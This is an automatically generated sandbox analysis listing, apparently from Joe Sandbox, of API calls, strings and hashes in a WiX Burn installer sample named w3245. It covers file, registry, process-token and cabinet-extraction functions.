                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,0091769D,00000000), ref: 009408D3
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0091769D,00000000), ref: 009408EC
                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0091769D,00000000), ref: 0094092B
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                    • String ID: procutil.cpp
                                                                                                                                                                    • API String ID: 4040495316-1178289305
                                                                                                                                                                    • Opcode ID: 1d07b117ce84087ee6935e2e6e757bfabd048a5a35e489b01013cd307cd623f2
                                                                                                                                                                    • Instruction ID: 95ce3d42e6c09a85539e9f38ebc587d32b4cb799d3295745afcff6eb8f7b5e87
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d07b117ce84087ee6935e2e6e757bfabd048a5a35e489b01013cd307cd623f2
                                                                                                                                                                    • Instruction Fuzzy Hash: C321C636D40229EBE7219B998905E9EBBBCEF90711F114156FE15EB251D3708E00EBD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 00916B49
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00916BB9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                                                                                    • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                                                                                                                                    • API String ID: 3498533004-3263533295
                                                                                                                                                                    • Opcode ID: c48175af16043d90c9a1e8282b6452284d511cef2de1d41e2bc39af9fd77c8d9
                                                                                                                                                                    • Instruction ID: df0edd26828ae1f66bf061ab3514d29316b56c58779e7c464d520554c70753ae
                                                                                                                                                                    • Opcode Fuzzy Hash: c48175af16043d90c9a1e8282b6452284d511cef2de1d41e2bc39af9fd77c8d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 1611E632B48618BFCB205A6CCC05F9B77ACDB85B34F010350FE24EB2E1D37488518691
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00943574
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(0096B6C8), ref: 00943591
                                                                                                                                                                    • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0096B6B8,?,?,?,?,?,?), ref: 009435AC
                                                                                                                                                                    • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0096B6B8,?,?,?,?,?,?), ref: 009435B8
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                                    • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                                    • API String ID: 2109125048-2356320334
                                                                                                                                                                    • Opcode ID: 0f339e13939271336ee26b2f41b9402e4309343bf14b774b1acf68d7324710e5
                                                                                                                                                                    • Instruction ID: ba61ec5452c232880f0d31ac471c0905b5d7f8b5e4c778f80242f39b244641b4
                                                                                                                                                                    • Opcode Fuzzy Hash: 0f339e13939271336ee26b2f41b9402e4309343bf14b774b1acf68d7324710e5
                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0E53175522957C3201B76FD18F0B2EA9EBC1B69F000529F808C2064E3A0C98186B0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00944A9D
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00944ACA
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00944AF6
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,0094B7A0,?,00000000,?,00000000,?,00000000), ref: 00944B34
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00944B65
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 1145190524-2967768451
                                                                                                                                                                    • Opcode ID: c21f5247588e8d19d738913aec74a4685b52ab852bf4378405dbdc12c4581fd3
                                                                                                                                                                    • Instruction ID: 764d4b24acd2d189ef159590720dbea90d0d1eb20ba2316ef76b70c85179290f
                                                                                                                                                                    • Opcode Fuzzy Hash: c21f5247588e8d19d738913aec74a4685b52ab852bf4378405dbdc12c4581fd3
                                                                                                                                                                    • Instruction Fuzzy Hash: 3E318436E84229ABC721DA998C41FAFBABCEF85750F114265FD14EB341E730DD0096E4
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00920B27
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 00920B31
                                                                                                                                                                    Strings
                                                                                                                                                                    • cabextract.cpp, xrefs: 00920B55
                                                                                                                                                                    • Failed to move file pointer 0x%x bytes., xrefs: 00920B62
                                                                                                                                                                    • Invalid seek type., xrefs: 00920ABD
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2976181284-417918914
                                                                                                                                                                    • Opcode ID: 0b4a24be21b1cd65e66090cffc2275d687b9b06ab12547e0037479ab0549cc60
                                                                                                                                                                    • Instruction ID: 461d059644c4bcff59e704cd84e41689abdcc89a9f158bd292d4d462ddbff2ed
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b4a24be21b1cd65e66090cffc2275d687b9b06ab12547e0037479ab0549cc60
                                                                                                                                                                    • Instruction Fuzzy Hash: 2331A332A4022AEFCF10DFA8EC45E6EB769FB84724B148615FD1497656D370ED108B90
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?), ref: 00904123
                                                                                                                                                                    • GetLastError.KERNEL32(?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?,00000000,00000000), ref: 00904131
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,840F01E8,00905489,?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?,00000000), ref: 0090419A
                                                                                                                                                                    • GetLastError.KERNEL32(?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?,00000000,00000000), ref: 009041A4
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                    • String ID: dirutil.cpp
                                                                                                                                                                    • API String ID: 1375471231-2193988115
                                                                                                                                                                    • Opcode ID: 56063cf70e9912432f9c88a8bb0820e920f307f1aca7c45a9baec812afeb17c3
                                                                                                                                                                    • Instruction ID: 7ab24ddb7d2d62cd29c3fe8ae45b840706f457ae37749a56b74fd3d56bfff6ea
                                                                                                                                                                    • Opcode Fuzzy Hash: 56063cf70e9912432f9c88a8bb0820e920f307f1aca7c45a9baec812afeb17c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 311105B660C335AED7B11AA54C40B3BA65CEF75B61F114021FF05EA1C0E3648C8192D0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00906595,00906595,?,0090563D,?,?,00000000), ref: 009056E5
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090563D,?,?,00000000,?,?,00906595,?,00907F02,?,?,?,?,?), ref: 00905714
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareErrorLastString
                                                                                                                                                                    • String ID: Failed to compare strings.$variable.cpp$version.dll
                                                                                                                                                                    • API String ID: 1733990998-4228644734
                                                                                                                                                                    • Opcode ID: 32e1e8e4ecdada2c341866069153a280de24bf8604c8e4211fbec2367fe0c170
                                                                                                                                                                    • Instruction ID: fa738ae90efb060e3cab2ee51c1f9bb4362655de87ef2c2c8632107cbf3f6007
                                                                                                                                                                    • Opcode Fuzzy Hash: 32e1e8e4ecdada2c341866069153a280de24bf8604c8e4211fbec2367fe0c170
                                                                                                                                                                    • Instruction Fuzzy Hash: A0210736645915EFC7108F98CD44E5ABBA8EB45730B220319E924EB3D0E670DE01AA90
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00904F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00940A38
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00904F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00940A46
                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 00940A8B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00904F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00940A95
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                                                                                                                                    • String ID: procutil.cpp
                                                                                                                                                                    • API String ID: 590199018-1178289305
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0092140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00920A19,?,?,?), ref: 00921434
                                                                                                                                                                      • Part of subcall function 0092140C: GetLastError.KERNEL32(?,00920A19,?,?,?), ref: 0092143E
                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00920A27
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00920A31
                                                                                                                                                                    Strings
                                                                                                                                                                    • cabextract.cpp, xrefs: 00920A55
                                                                                                                                                                    • Failed to read during cabinet extraction., xrefs: 00920A5F
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                    • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2170121939-2426083571
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00920A19,?,?,?), ref: 00921434
                                                                                                                                                                    • GetLastError.KERNEL32(?,00920A19,?,?,?), ref: 0092143E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to move to virtual file pointer., xrefs: 0092146C
                                                                                                                                                                    • cabextract.cpp, xrefs: 00921462
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2976181284-3005670968
                                                                                                                                                                    APIs
                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00943F73
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00943FD6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 1948546556-2967768451
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00943F9A,?,?,?), ref: 00944E5E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00943F9A,?,?,?), ref: 00944E68
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 442123175-2967768451
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00918770,00000000,00000000,00000000,00000000,00000000), ref: 00944925
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00918770,00000000,00000000,00000000,00000000,00000000), ref: 0094492F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 2976181284-2967768451
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00903877
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00903881
                                                                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 009038EA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1230559179-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00903BB6,00000000,?,00901474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009013B8), ref: 00903A20
                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?,00903BB6,00000000,?,00901474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009013B8,000001C7,00000100), ref: 00903A27
                                                                                                                                                                    • GetLastError.KERNEL32(?,00903BB6,00000000,?,00901474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009013B8,000001C7,00000100,?), ref: 00903A31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 406640338-0
                                                                                                                                                                    • Opcode ID: ff8aecf132aea2e1c67e8ad52356335365dbd46ce6a32c0fdb32c5e02bf2ca0e
                                                                                                                                                                    • Instruction ID: a54d750c44eba242e11deca1aa2d5c7d8df68377fd4766cf8d26e51a7d12e012
                                                                                                                                                                    • Opcode Fuzzy Hash: ff8aecf132aea2e1c67e8ad52356335365dbd46ce6a32c0fdb32c5e02bf2ca0e
                                                                                                                                                                    • Instruction Fuzzy Hash: C0D01277A181395B872117EA5C5CD5B7F5CEF06BA27014121FE44D6260D725CD00A6E4
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 71445658-955085611
                                                                                                                                                                    • Opcode ID: 6ae0dba38477afece1617481de767b7ed508ed10d23572bb5b8892fdebdd5e93
                                                                                                                                                                    • Instruction ID: a8da6860f99850d4c7438b25f8457d2113bb6c0239f069a47175c431283e1560
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ae0dba38477afece1617481de767b7ed508ed10d23572bb5b8892fdebdd5e93
                                                                                                                                                                    • Instruction Fuzzy Hash: B5F08B336011367B8B3005568C05F6FBE5DEBC07B0F1585B5BF46AE250E2718C00A6F0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0093F491
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: 692dbcc41cf3e66cc6066d30401fef48abda9718cacf78ede78732ebd7ed1ef7
                                                                                                                                                                    • Instruction ID: 0f26b6b7a0f7c2185e96bb06aeaca45603f2083f54021c0f9f33ffd3539c27da
                                                                                                                                                                    • Opcode Fuzzy Hash: 692dbcc41cf3e66cc6066d30401fef48abda9718cacf78ede78732ebd7ed1ef7
                                                                                                                                                                    • Instruction Fuzzy Hash: 62B012A12795016E325491141D2BD37024CC2C5FB1330466EF000C1060E8464C050832
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0093F491
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: a44daa55f747345d8417c8675a7de2f8b6519abb47920ff5124dbe293ac90920
                                                                                                                                                                    • Instruction ID: 8b9d382faa70b182998f151042a6dfe969cd07e8d3d0ea20eab2be9d1801681a
                                                                                                                                                                    • Opcode Fuzzy Hash: a44daa55f747345d8417c8675a7de2f8b6519abb47920ff5124dbe293ac90920
                                                                                                                                                                    • Instruction Fuzzy Hash: B8B012A12796016D325891141C2AD37024CC2C5FB1330876EF000C1060E8414C440432
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0093F491
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: c2a58facd204f60f0f214c94cdb857d7956c62dda8ebf53515be7841ac055541
                                                                                                                                                                    • Instruction ID: fd37abb28de68c5a5a2e10dd0cea63db65718beea04bba63cf0c9790626d9d82
                                                                                                                                                                    • Opcode Fuzzy Hash: c2a58facd204f60f0f214c94cdb857d7956c62dda8ebf53515be7841ac055541
                                                                                                                                                                    • Instruction Fuzzy Hash: 99B012A52795017D321451101C2AC37020CC2C1FB1330C76EF400D0060A8415C080432
                                                                                                                                                                    APIs
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 009435F8
                                                                                                                                                                      • Part of subcall function 0094304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00943609,00000000,?,00000000), ref: 00943069
                                                                                                                                                                      • Part of subcall function 0094304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0092C025,?,00905405,?,00000000,?), ref: 00943075
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 52713655-0
                                                                                                                                                                    • Opcode ID: 5973c2c0716ef4e42af46cbec46a010749d1061084e83c238a6a5b1421e32c78
                                                                                                                                                                    • Instruction ID: 08fe7bf75dad9af3ecee23a96757010d4f225e4aae6ad61de4a580fd96276468
                                                                                                                                                                    • Opcode Fuzzy Hash: 5973c2c0716ef4e42af46cbec46a010749d1061084e83c238a6a5b1421e32c78
                                                                                                                                                                    • Instruction Fuzzy Hash: 64312F76D01229ABCB11DFA9C885ADEB7F8EF08710F02856AED15BB311D6759D008BA4
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(80070490,00000000,80070490,0096AAA0,00000000,80070490,?,?,00918B19,WiX\Burn,PackageCache,00000000,0096AAA0,00000000,00000000,80070490), ref: 009458CA
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0094112B
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00941163
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$Close
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1979452859-0
                                                                                                                                                                    • Opcode ID: 3c5984ac08117d0c6125a2343b9b57678446faf069e412507f28a96dd72335c4
                                                                                                                                                                    • Instruction ID: 70247cb1b8272e3771ec4f1f387fb52c8f931b20807e19ff80c9ab30a3f5fffb
                                                                                                                                                                    • Opcode Fuzzy Hash: 3c5984ac08117d0c6125a2343b9b57678446faf069e412507f28a96dd72335c4
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11A03680062AEFCB22AEE48841EAEBB6CEF44320B124139FD0167313CB314E50D7D1
                                                                                                                                                                    APIs
                                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00918BD3,0000001C,80070490,00000000,00000000,80070490), ref: 009034D5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FolderPath
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1514166925-0
                                                                                                                                                                    • Opcode ID: c9054b364d2d0d4657cd5d0f985d4bced6c9adf7f3a4912a542438ec348868d1
                                                                                                                                                                    • Instruction ID: 400732f7e4d9a5e0a033edc44574e6effa32674286f83b6a9a68342013b49f51
                                                                                                                                                                    • Opcode Fuzzy Hash: c9054b364d2d0d4657cd5d0f985d4bced6c9adf7f3a4912a542438ec348868d1
                                                                                                                                                                    • Instruction Fuzzy Hash: C5E012723011287FE6022F629C05DAB7B5C9F463547008051BE40D6050D762D55096B0
                                                                                                                                                                    APIs
                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,00000000,0090556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00942F0B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
